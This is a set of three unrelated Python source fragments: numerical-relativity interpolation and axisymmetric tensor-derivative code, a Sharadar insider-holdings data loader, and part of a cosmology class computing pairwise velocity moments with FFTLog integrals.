**kwargs) return out def _interp1d(arr, ii, coord, linear, cache=None, base_idx=None): r"""Perform 1-D interpolation of a sequence of values. This takes a 1-D sequence of values, `arr`, and interpolates a value in relative index space at `coord` as described in interpolate(). The order of the interpolating polynomial is determined by the length of the sequence. The result is a floating point value. @param arr 1-D array-like with values. @param ii In case a `cache` is used, the parameter `ii` should consist of indices that are *not* varied along the axis currently interpolated along. These are added to the last indices of `base_idx` to generate a unique key for the data of this axis, which will still be the same each time this strip of data is encountered (i.e. even if it is at a different position in the matrix patch currently considered). @param coord Float indicating the coordinate in relative index space at which to interpolate. @param linear If `True`, perform simple linear interpolation instead of Lagrange interpolation. @param cache Dictionary to use as cache. If given, `base_idx` must also be supplied. @param base_idx Tuple of as many indices as `mat` has axes. This allows the optional cache to be applicable to the full data. """ if arr.size == 1: return arr[0] if linear: i = int(abs(coord)) fa = arr[i] fb = arr[i+1] x = abs(coord) return fa + (x-i) * (fb - fa) else: if cache is not None: key = (base_idx[0],) + tuple(map(add, base_idx[1:], ii)) try: poly = cache[key] except KeyError: # This call is the most expensive one when evaluating # numerical data during a MOTS search. It might benefit # significantly from a faster (e.g. Cython) implementation. poly = lagrange(range(arr.size), arr) cache[key] = poly else: poly = lagrange(range(arr.size), arr) return poly(coord) def fd_xz_derivatives(mat, region, dx, dz, derivs, stencil_size=5): r"""Perform finite difference differentiation on specified grid points. Given a matrix `mat` containing values on a grid, this function approximates the first or second derivative for each grid point in the given `region` using 3-, 5-, 7- or 9-point stencils. Note that only `x` and `z` (and possibly mixed) derivatives are computed, even though `mat` needs to have three axes. @return For each element of `derivs`, a matrix of the shape of `region`. @param mat Matrix with the values to use. Must have at least ``(stencil_size-1)/2`` additional points in the first and third axes on the borders of the given `region`. @param region Region of grid points at which to compute the derivatives. Should consist of three iterables of indices, the tensor product of which defines the actual set of indices in the region. @param dx,dz Physical distance of grid points in coordinate space along the axes. @param derivs Derivative orders to compute. To compute the x-, z-, and x-z-derivatives, use ``derivs=([1, 0], [0, 1], [1, 1])``. @param stencil_size Number of grid points to consider (i.e. the "size" of the stencil). This determines the order of accuracy of the derivative computed. Allowed values currently are 3, 5, 7, 9. """ try: return _fd_xz_derivatives(mat, region, dx, dz, derivs, stencil_size) except (ValueError, IndexError) as e: raise NumericalError("%s" % e) def _fd_xz_derivatives(mat, region, dx, dz, derivs, stencil_size): r"""Implement fd_xz_derivatives().""" n = int((stencil_size-1)/2) if n != (stencil_size-1)/2 or n > len(COEFFS_1ST): raise ValueError("Unsupported stencil size: %s" % stencil_size) shape = [len(r) for r in region] coeffs1 = COEFFS_1ST[n - 1] coeffs2 = COEFFS_2ND[n - 1] i0, j0, k0 = [r[0] for r in region] results = [] for nx, nz in derivs: result = np.zeros(shape) for i, j, k in itertools.product(*region): if nx == 1 and nz == 0: result[i-i0, j-j0, k-k0] = 1/dx * ( mat[i-n:i+n+1, j, k].dot(coeffs1) ) elif nx == 0 and nz == 1: result[i-i0, j-j0, k-k0] = 1/dz * ( mat[i, j, k-n:k+n+1].dot(coeffs1) ) elif nx == 1 and nz == 1: result[i-i0, j-j0, k-k0] = 1/(dx*dz) * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs1).dot(coeffs1) ) elif nx == 2 and nz == 0: result[i-i0, j-j0, k-k0] = 1/dx**2 * ( mat[i-n:i+n+1, j, k].dot(coeffs2) ) elif nx == 0 and nz == 2: result[i-i0, j-j0, k-k0] = 1/dz**2 * ( mat[i, j, k-n:k+n+1].dot(coeffs2) ) elif nx == 2 and nz == 1: result[i-i0, j-j0, k-k0] = 1/(dx*dx*dz) * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs1).dot(coeffs2) ) elif nx == 1 and nz == 2: result[i-i0, j-j0, k-k0] = 1/(dx*dz*dz) * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs2).dot(coeffs1) ) elif nx == 2 and nz == 2: result[i-i0, j-j0, k-k0] = 1/(dx*dz)**2 * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs2).dot(coeffs2) ) else: raise NotImplementedError( "Derivative order not implemented: %s, %s" % (nx, nz) ) results.append(result) return results def eval_sym_axisym_matrix(comp_funcs, *lower_orders, point, diff=0): r"""Evaluate (derivatives of) a symmetric tensor field at a point. This takes the six independent component functions of the `xx`, `xy`, `xz`, `yy`, `yz`, and `zz` components (in that order) of a tensor field `T`. These should be DataPatch objects. It then computes the derivatives of the requested order `diff` in all three coordinate directions using the axisymmetry of the tensor to infer the y-derivatives from the x-derivative. In order to compute derivatives, all lower order derivatives are required (including order 0). These have to be supplied as positional arguments after the list of component functions. @return For ``diff=0``, returns the 3x3 matrix representing `T` interpolated at `point`, i.e. \f$T_{ij}\f$. If ``diff=1``, returns ``dT[i,j,k]``, where the indices mean \f$\partial_i T_{jk}\f$ and if ``diff=2``, returns ``ddT[i,j,k,l]`` with indices \f$\partial_i\partial_j T_{kl}\f$. @param comp_funcs An iterable of the six independent component functions (DataPatch) of the tensor field. @param *lower_orders Further positional arguments supplying the lower order derivatives. For `diff=0`, none should be supplied. For `diff=1`, one argument, `T` itself, should be given. For `diff=2`, `T` and `dT` should be given in that order. @param point The point at which to compute. @param diff Derivative order to compute. Default is `0`. @b Notes Based on the considerations in [1], the y-derivatives of tensor field components in the xz-plane can be computed by differentiating eq. (7) in [1] w.r.t. `y` and evaluating at `y=0`. The results are \f{eqnarray*}{ (\partial_y T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} -2T_{xy} & T_{xx}-T_{yy} & -T_{yz} \\ T_{xx}-T_{yy} & 2T_{xy} & T_{xz} \\ -T_{yz} & T_{xz} & 0 \end{array}\right) \\ (\partial_x\partial_y T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} -2T_{xy,x} + \frac{2 T_{xy}}{x} & T_{xx,x} - \frac{T_{xx}}{x} - T_{yy,x} + \frac{T_{yy}}{x} & - T_{yz,x} + \frac{T_{yz}}{x} \\ T_{xx,x}-T_{yy,x}-\frac{T_{xx}}{x} + \frac{T_{yy}}{x} & 2 T_{xy,x} - \frac{2 T_{xy}}{x} & T_{xz,x} - \frac{T_{xz}}{x} \\ -T_{yz,x}+\frac{T_{yz}}{x} & T_{xz,x} - \frac{T_{xz}}{x} & 0 \end{array}\right) \\ (\partial_y\partial_y T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} T_{xx,x}-\frac{2 T_{xx}}{x} + \frac{2 T_{yy}}{x} & T_{xy,x} - \frac{4 T_{xy}}{x} & T_{xz,x} - \frac{T_{xz}}{x}\\ T_{xy,x}-\frac{4 T_{xy}}{x} & \frac{2 T_{xx}}{x} + T_{yy,x} - \frac{2 T_{yy}}{x} & T_{yz,x} - \frac{T_{yz}}{x}\\ T_{xz,x}-\frac{T_{xz}}{x} & T_{yz,x} - \frac{T_{yz}}{x} & T_{zz,x} \end{array}\right) \\ (\partial_y\partial_z T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} -2 T_{xy,z} & T_{xx,z}-T_{yy,z} & -T_{yz,z}\\ T_{xx,z}-T_{yy,z} & 2 T_{xy,z} & T_{xz,z}\\ -T_{yz,z} & T_{xz,z} & 0 \end{array}\right). \f} Note that since we don't transform the derivative but use eq. (7) as defining `T` for ``y != 0``, the rotation matrices `R` have to be taken as dependent on `y` and not as rigid rotations. @b References [1] <NAME>, et al. "Symmetry without symmetry: Numerical simulation of axisymmetric systems using Cartesian grids." International Journal of Modern Physics D 10.03 (2001): 273-289. """ if diff == 0: T00, T01, T02, T11, T12, T22 = [ Tij.interpolate(point) for Tij in comp_funcs ] return np.array([[T00, T01, T02], [T01, T11, T12], [T02, T12, T22]]) if diff == 1: T, = lower_orders ( (T00x, T00z), (T01x, T01z), (T02x, T02z), (T11x, T11z), (T12x, T12z), (T22x, T22z) ) = [ Tij.diff(point, diff=1) for Tij in comp_funcs ] Tx = np.array([[T00x, T01x, T02x], [T01x, T11x, T12x], [T02x, T12x, T22x]]) Tz = np.array([[T00z, T01z, T02z], [T01z, T11z, T12z], [T02z, T12z, T22z]]) Ty = _get_Ty(point, T, dTdx=Tx) return np.asarray([Tx, Ty, Tz]) if diff == 2: T, dT = lower_orders ( (T00xx, T00zz, T00xz), (T01xx, T01zz, T01xz), (T02xx, T02zz, T02xz), (T11xx, T11zz, T11xz), (T12xx, T12zz, T12xz), (T22xx, T22zz, T22xz), ) = [ Tij.diff(point, diff=2) for Tij in comp_funcs ] Txx = np.array([[T00xx, T01xx, T02xx], [T01xx, T11xx, T12xx], [T02xx, T12xx, T22xx]]) Tzz = np.array([[T00zz, T01zz, T02zz], [T01zz, T11zz, T12zz], [T02zz, T12zz, T22zz]]) Txz = np.array([[T00xz, T01xz, T02xz], [T01xz, T11xz, T12xz], [T02xz, T12xz, T22xz]]) Txy, Tyy, Tyz = _get_Txy_Tyy_Tyz(point, T, dT) return np.asarray([[Txx, Txy, Txz], [Txy, Tyy, Tyz], [Txz, Tyz, Tzz]]) raise ValueError("Unknown `diff` value: %s" % diff) def _get_fy(): r"""Compute the y-derivative of scalar f in x-z-plane assuming axisymmetry.""" return 0. def _get_fxy_fyy_fyz(point, df): r"""Compute the 2nd (y-)derivatives of scalar f in x-z-plane assuming axisymmetry.""" x = point[0] fx = df[0] fxy = fyz = 0. if x == 0: fyy = np.nan else: fyy = fx/x return fxy, fyy, fyz def _get_Vy(point, V): r"""Compute the y-derivative of vector V in x-z-plane assuming axisymmetry.""" x = point[0] if x == 0: Vy = nan_mat((3,)) else: Vy = 1/x * np.array([-V[1], V[0], 0.]) return Vy def _get_Vxy_Vyy_Vyz(point, V, dV): r"""Compute the 2nd (y-)derivatives of vector V in x-z-plane assuming axisymmetry.""" x = point[0] # pylint: disable=unsubscriptable-object if x == 0: Vxy = nan_mat((3,)) Vyy = nan_mat((3,)) Vyz = nan_mat((3,)) else: # note: dV[i,j] == partial_i V^j == V^j_{,i} Vxy = 1/x * np.array([V[1]/x - dV[0,1], -V[0]/x + dV[0,0], 0.]) Vyy = 1/x * np.array([-V[0]/x + dV[0,0], -V[1]/x + dV[0,1], dV[0,2]]) Vyz = 1/x * np.array([-dV[2,1], dV[2,0], 0.]) return Vxy, Vyy, Vyz def _get_Ty(point, T, dTdx=None): r"""Compute the y-derivative of matrix T in x-z-plane assuming axisymmetry. Here, `T = (T_ij)` is a matrix-valued function (covariant tensor field). See docstring of eval_sym_axisym_matrix() for the implemented formulas. """ x = point[0] T = np.asarray(T) if x == 0: # From the symmetries of an axisymmetric tensor in Cartesian # coordinates, some components are trivially zero: # \partial_y {Txx, Tyy, Tzz, Txy} = 0 # For the remaining components Txz, Tyz we use L'Hospital's rule. if dTdx is None: return nan_mat(T.shape) dy_Txz = -dTdx[1,2] dy_Tyz = dTdx[0,2] return np.array([ [0.0, 0.0, dy_Txz], [0.0, 0.0, dy_Tyz], [dy_Txz, dy_Tyz, 0.0], ]) return np.array([[-2*T[0,1]/x, (T[0,0]-T[1,1])/x, -T[1,2]/x], [(T[0,0]-T[1,1])/x, 2*T[0,1]/x, T[0,2]/x], [-T[1,2]/x, T[0,2]/x, 0.]]) def _get_Txy_Tyy_Tyz(point, T, dT): r"""Compute the 2nd (y-)derivatives of matrix T in x-z-plane assuming axisymmetry. Here, `T = (T_ij)` is a matrix-valued function (covariant tensor field). The derivatives are those involving the y-direction, i.e. `x,y`, `y,y`, `y,z`, in that order. See docstring of eval_sym_axisym_matrix() for the implemented formulas. """ x = point[0] T = np.asarray(T) dT = np.asarray(dT) if x == 0: Txy = nan_mat((3, 3)) Tyy = nan_mat((3, 3)) Tyz = nan_mat((3, 3)) else: Txy = 1/x * np.array([ [2 * (T[0,1]/x - dT[0,0,1]), dT[0,0,0] - dT[0,1,1] + (T[1,1]-T[0,0])/x, T[1,2]/x - dT[0,1,2]], [0, 2 * (dT[0,0,1] - T[0,1]/x), dT[0,0,2] - T[0,2]/x], [0, 0, 0] ]) _sym3x3(Txy) Tyy = 1/x * np.array([ [dT[0,0,0] - 2 * (T[0,0]-T[1,1])/x, dT[0,0,1] - 4 * T[0,1]/x, dT[0,0,2] - T[0,2]/x], [0, 2 * (T[0,0] - T[1,1])/x + dT[0,1,1], dT[0,1,2]-T[1,2]/x], [0, 0, dT[0,2,2]] ]) _sym3x3(Tyy) Tyz = 1/x * np.array([ [-2*dT[2,0,1], dT[2,0,0]-dT[2,1,1], -dT[2,1,2]], [0, 2*dT[2,0,1], dT[2,0,2]], [0, 0, 0] ]) _sym3x3(Tyz) return Txy, Tyy, Tyz def _sym3x3(T): r"""Symmetrize a 3x3 matrix by replacing the lower-left three components.""" T[1,0], T[2,0], T[2,1] = T[0,1], T[0,2], T[1,2]
from serenity.data.batch.load_sharadar_tickers import LoadSharadarTickersTask from serenity.data.batch.utils import LoadSharadarTableTask, ExportQuandlTableTask from serenity.data.sharadar_api import clean_nulls, yes_no_to_bool from serenity.data.sharadar_holdings import FormType, SecurityAdType, TransactionType, SecurityTitleType, \ InsiderHoldings from serenity.data.sharadar_refdata import Ticker # noinspection DuplicatedCode class LoadInsiderHoldingsTask(LoadSharadarTableTask): def requires(self): return [ LoadSharadarTickersTask(start_date=self.start_date, end_date=self.end_date), ExportQuandlTableTask(table_name=self.get_workflow_name(), date_column='filingdate', start_date=self.start_date, end_date=self.end_date) ] def process_row(self, index, row): ticker_code = row['ticker'] ticker = Ticker.find_by_ticker(self.session, ticker_code) filing_date = row['filingdate'] form_type_code = row['formtype'] form_type = FormType.get_or_create(self.session, form_type_code) issuer_name = row['issuername'] owner_name = row['ownername'] officer_title = row['officertitle'] is_director = yes_no_to_bool(row['isdirector']) is_officer = yes_no_to_bool(row['isofficer']) is_ten_percent_owner = yes_no_to_bool(row['istenpercentowner']) transaction_date = clean_nulls(row['transactiondate']) security_ad_type_code = clean_nulls(row['securityadcode']) security_ad_type = SecurityAdType.get_or_create(self.session, security_ad_type_code) transaction_type_code = clean_nulls(row['transactioncode']) transaction_type = TransactionType.get_or_create(self.session, transaction_type_code) shares_owned_before_transaction = clean_nulls(row['sharesownedbeforetransaction']) transaction_shares = clean_nulls(row['transactionshares']) shares_owned_following_transaction = clean_nulls(row['sharesownedfollowingtransaction']) transaction_price_per_share = clean_nulls(row['transactionpricepershare']) transaction_value = clean_nulls(row['transactionvalue']) security_title_type_code = clean_nulls(row['securitytitle']) security_title_type = SecurityTitleType.get_or_create(self.session, security_title_type_code) direct_or_indirect = clean_nulls(row['directorindirect']) nature_of_ownership = clean_nulls(row['natureofownership']) date_exercisable = clean_nulls(row['dateexercisable']) price_exercisable = clean_nulls(row['priceexercisable']) expiration_date = clean_nulls(row['expirationdate']) row_num = row['rownum'] holdings = InsiderHoldings.find(self.session, ticker_code, filing_date, owner_name, form_type, row_num) if holdings is None: holdings = InsiderHoldings(ticker_code=ticker_code, ticker=ticker, filing_date=filing_date, form_type=form_type, issuer_name=issuer_name, owner_name=owner_name, officer_title=officer_title, is_director=is_director, is_officer=is_officer, is_ten_percent_owner=is_ten_percent_owner, transaction_date=transaction_date, security_ad_type=security_ad_type, transaction_type=transaction_type, shares_owned_before_transaction=shares_owned_before_transaction, transaction_shares=transaction_shares, shares_owned_following_transaction=shares_owned_following_transaction, transaction_price_per_share=transaction_price_per_share, transaction_value=transaction_value, security_title_type=security_title_type, direct_or_indirect=direct_or_indirect, nature_of_ownership=nature_of_ownership, date_exercisable=date_exercisable, price_exercisable=price_exercisable, expiration_date=expiration_date, row_num=row_num) else: holdings.ticker = ticker holdings.issuer_name = issuer_name holdings.officer_title = officer_title holdings.is_director = is_director holdings.is_officer = is_officer holdings.is_ten_percent_owner = is_ten_percent_owner holdings.transaction_date = transaction_date holdings.shares_owned_before_transaction = shares_owned_before_transaction holdings.transaction_shares = transaction_shares holdings.shares_owned_following_transaction = shares_owned_following_transaction holdings.transaction_price_per_share = transaction_price_per_share holdings.transaction_value = transaction_value holdings.security_title_type = security_title_type holdings.direct_or_indirect = direct_or_indirect holdings.nature_of_ownership = nature_of_ownership holdings.date_exercisable = date_exercisable holdings.price_exercisable = price_exercisable holdings.expiration_date = expiration_date self.session.add(holdings) def get_workflow_name(self): return 'SHARADAR/SF2'
<reponame>kokron/velocileptors import numpy as np import time from scipy.interpolate import interp1d from velocileptors.Utils.loginterp import loginterp from velocileptors.Utils.spherical_bessel_transform_fftw import SphericalBesselTransform from velocileptors.Utils.qfuncfft import QFuncFFT from velocileptors.LPT.cleft_fftw import CLEFT class VelocityMoments(CLEFT): ''' Class based on cleft_fftw to compute pairwise velocity moments. ''' def __init__(self, *args, beyond_gauss = False, **kw): ''' If beyond_gauss = True computes the third and fourth moments, otherwise default is to enable calculation of P(k), v(k) and sigma(k). Other keywords the same as the cleft_fftw class. Go look there! ''' # Set up the configuration space quantities CLEFT.__init__(self, *args, **kw) self.beyond_gauss = beyond_gauss self.setup_onedot() self.setup_twodots() # v12 and sigma12 only have a subset of the bias contributions so we don't need to have as many FFTs if self.third_order: self.num_vel_components = 8; self.vii = np.array([0,1,2,3,4,6,7,10]) + 1 self.num_spar_components = 5; self.sparii = np.array([0,1,2,3,6]) + 1 self.num_strace_components = 5; self.straceii = np.array([0,1,2,3,6]) + 1 elif self.shear: self.num_vel_components = 7; self.vii = np.array([0,1,2,3,4,6,7]) + 1 self.num_spar_components = 5; self.sparii = np.array([0,1,2,3,6]) + 1 self.num_strace_components = 5; self.straceii = np.array([0,1,2,3,6]) + 1 else: self.num_vel_components = 5; self.vii = np.array([0,1,2,3,4]) + 1 self.num_spar_components = 4; self.sparii = np.array([0,1,2,3]) + 1 self.num_strace_components = 4; self.straceii = np.array([0,1,2,3]) + 1 self.sph_v = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_vel_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) self.sph_spar = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_spar_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) self.sph_strace = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_strace_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) if self.beyond_gauss: # Beyond the first two moments self.num_gamma_components = 2; self.gii = np.array([0,1]) + 1 # gamma has matter (all loop, so lump into 0) and b1 self.sph_gamma1 = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_gamma_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) self.sph_gamma2 = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_gamma_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) # fourth moment self.num_kappa_components = 3; self.kii = np.array([0,1,2]) + 1 # note that these are not the bias comps self.sph_kappa = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_kappa_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) def update_power_spectrum(self,k,p): ''' Same as the one in cleft_fftw but also do the velocities. ''' super(VelocityMoments,self).update_power_spectrum(k,p) self.setup_onedot() self.setup_twodots() self.setup_threedots() def setup_onedot(self): ''' Create quantities linear in f. All quantities are with f = 1, since converting back is trivial. ''' self.Xdot = self.Xlin; self.sigmadot = self.Xdot[-1] self.Ydot = self.Ylin self.Vdot = 4./3 * self.Vloop # these are only the symmetrized version since all we need... self.Tdot = 4./3 * self.Tloop # is k_i k_j k_k W_{ijk} self.Udot = self.Ulin self.Uloopdot = 3 * self.U3 self.U11dot = 2 * self.U11 self.U20dot = 2 * self.U20 # some one loop terms have to be explicitly set to zero if self.one_loop: self.Xloopdot = (4 * self.qf.Xloop13 + 2 * self.qf.Xloop22) * self.one_loop; self.sigmaloopdot = self.Xloopdot[-1] self.Yloopdot = (4 * self.qf.Yloop13 + 2 * self.qf.Yloop22) * self.one_loop self.X10dot = 1.5 * self.X10; self.sigma10dot = self.X10dot[-1] self.Y10dot = 1.5 * self.Y10 else: self.Xloopdot = 0; self.sigmaloopdot = 0 self.Yloopdot = 0 self.X10dot = 0; self.sigma10dot = 0 self.Y10dot = 0 if self.shear: self.Us2dot = 2 * self.Us2 self.V12dot = self.V self.Xs2dot = self.Xs2; self.sigmas2dot = self.Xs2dot[-1] self.Ys2dot = self.Ys2 if self.third_order: self.Ub3dot = self.Ub3 def setup_twodots(self): ''' Same as onedot but now for those quadratic in f. ''' self.Xddot = self.Xlin; self.sigmaddot = self.Xddot[-1] self.Yddot = self.Ylin # Here we will need two forms, one symmetrized: self.Vddot = 5./3 * self.Vloop #these are only the symmetrized version since all we need... self.Tddot = 5./3 * self.Tloop # is k_i k_j k_k W_{ijk} # Explicitly set certain terms to zero if not one loop if self.one_loop: self.Xloopddot = (4 * self.qf.Xloop22 + 6 * self.qf.Xloop13) * self.one_loop; self.sigmaloopddot = self.Xloopddot[-1] self.Yloopddot = (4 * self.qf.Yloop22 + 6 * self.qf.Yloop13) * self.one_loop self.X10ddot = 2 * self.X10; self.sigma10ddot = self.X10ddot[-1] self.Y10ddot = 2 * self.Y10 # and the other from k_i \delta_{jk} \ddot{W}_{ijk} self.kdelta_Wddot = (18 * self.qf.V1loop112 + 7 * self.qf.V3loop112 + 5 * self.qf.Tloop112) * self.one_loop else: self.Xloopddot = 0; self.sigmaloopddot = 0 self.Yloopddot = 0 self.X10ddot = 0; self.sigma10ddot = 0 self.Y10ddot = 0 self.kdelta_Wddot = 0 if self.shear: self.Xs2ddot = self.Xs2; self.sigmas2ddot = self.Xs2ddot[-1] self.Ys2ddot = self.Ys2 def setup_threedots(self): self.Vdddot = 2 * self.Vloop self.Tdddot = 2 * self.Tloop def v_integrals(self,k): ''' Gives bias contributions to v(k) at a given k. ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_vel_components) bias_integrands = np.zeros( (self.num_vel_components,self.N) ) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. - 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 bias_integrands[0,:] = k * (self.Xdot + self.Xloopdot + mu2fac * (self.Ydot + self.Yloopdot)) - 0.5 * ksq * (mu1fac * self.Vdot + mu3fac * self.Tdot) # matter bias_integrands[1,:] = 2* (-ksq * self.Ulin * (mu1fac*self.Xdot + mu3fac * self.Ydot) + mu1fac * (self.Udot + self.Uloopdot) + k * (self.X10dot + mu2fac * self.Y10dot) ) # b1 bias_integrands[2,:] = 2*k*mu2fac*self.Ulin*self.Udot + mu1fac*self.U11dot + k * self.corlin * (self.Xdot + self.Ydot * mu2fac) # b1sq bias_integrands[3,:] = 2*k*self.Ulin*self.Udot * mu2fac + self.U20dot * mu1fac # b2 bias_integrands[4,:] = 2 * self.corlin * self.Udot * mu1fac# b1b2 if self.shear or self.third_order: bias_integrands[5,:] = 2*self.Us2dot*mu1fac + 2*k * (self.Xs2dot + mu2fac * self.Ys2dot) #bs: the second factor used to miss a factor of two bias_integrands[6,:] = 2*self.V12dot*mu1fac #b1 bs if self.third_order: bias_integrands[7,:] = 2*self.Ub3dot * mu1fac # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_v.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def spar_integrals(self,k): ''' Gives bias contributions to \sigma_\parallel at a given k. ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_spar_components) bias_integrands = np.zeros( (self.num_spar_components,self.N) ) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. - 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 mu4fac = 1 - 4*l/ksq/self.Ylin + 4*l*(l-1)/(ksq*self.Ylin)**2 bias_integrands[0,:] = self.Xddot + self.Yddot * mu2fac + self.Xloopddot - ksq*self.Xdot**2 + (self.Yloopddot - 2*ksq*self.Xdot*self.Ydot)*mu2fac - ksq*self.Ydot**2*mu4fac - k * (mu1fac * self.Vddot + mu3fac * self.Tddot) # matter bias_integrands[1,:] = 2 * ( self.X10ddot -k*(self.Ulin*self.Xddot + 2*self.Udot*self.Xdot)*mu1fac + self.Y10ddot*mu2fac - k*(self.Ulin*self.Yddot + 2*self.Udot*self.Ydot)*mu3fac ) # b1 bias_integrands[2,:] = self.corlin*self.Xddot + (self.corlin*self.Yddot + 2*self.Udot**2)*mu2fac # b1sq bias_integrands[3,:] = 2 * self.Udot**2 * mu2fac # b2 if self.shear or self.third_order: bias_integrands[4,:] = 2 * (self.Xs2ddot + self.Ys2ddot * mu2fac) # bs # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_spar.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def strace_integrals(self,k): ''' Gives bias contributions to \sigma_\parallel at a given k. ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_strace_components) bias_integrands = np.zeros( (self.num_strace_components,self.N) ) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. - 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 bias_integrands[0,:] = (3 * self.Xddot + self.Yddot) + 3 * self.Xloopddot + self.Yloopddot - ksq*self.Xdot**2 - ksq*(self.Ydot**2+2*self.Xdot*self.Ydot)*mu2fac - k * self.kdelta_Wddot * mu1fac # za bias_integrands[1,:] = 2 * ( (3*self.X10ddot + self.Y10ddot) - k*self.Ulin*(3*self.Xddot+self.Yddot)*mu1fac - 2*k*self.Udot*(self.Xdot+self.Ydot)*mu1fac ) # b1 bias_integrands[2,:] = self.corlin*(3*self.Xddot + self.Yddot) + 2*self.Udot**2 # b1sq bias_integrands[3,:] = 2 * self.Udot**2 # b2 if self.shear or self.third_order: bias_integrands[4,:] = 2 * (3*self.Xs2ddot + self.Ys2ddot) if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_strace.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def gamma1_integrals(self,k): ''' Gives bias contributions to Im[\hk_i \hk_j \hk_k \gamma_{ijk}] ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_gamma_components) bias_integrands = np.zeros( (self.num_gamma_components,self.N) ) #zero_lags = np.array([self.sigmadot*self.sigmaddot]) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. - 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 mu4fac = 1 - 4*l/ksq/self.Ylin + 4*l*(l-1)/(ksq*self.Ylin)**2 bias_integrands[0,:] = self.Vdddot*mu1fac+self.Tdddot*mu3fac + 3*k*(self.Xdot*self.Xddot + (self.Xdot*self.Yddot+self.Ydot*self.Xddot)*mu2fac + self.Ydot*self.Yddot * mu4fac ) # matter bias_integrands[1,:] = (6*self.Udot*(self.Xddot*mu1fac + self.Yddot*mu3fac)) # b1 # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_gamma1.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def gamma2_integrals(self,k): ''' Gives bias contributions to Im[ \hk_i \delta_{jk} \gamma_{ijk} ] ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_gamma_components) bias_integrands = np.zeros( (self.num_gamma_components,self.N) ) #zero_lags = np.array([5*self.sigmadot*self.sigmaddot]) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin bias_integrands[0,:] = (5*self.Vdddot/3+self.Tdddot)*mu1fac + k*( 5*self.Xdot*self.Xddot+self.Xdot*self.Yddot +(2*self.Xdot*self.Yddot+self.Ydot*(5*self.Xddot+3*self.Yddot) )*mu2fac ) # matter bias_integrands[1,:] = (2*self.Udot*(5*self.Xddot + 3*self.Yddot)*mu1fac) # b1 # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_gamma2.sph(l, bias_integrands) ret += 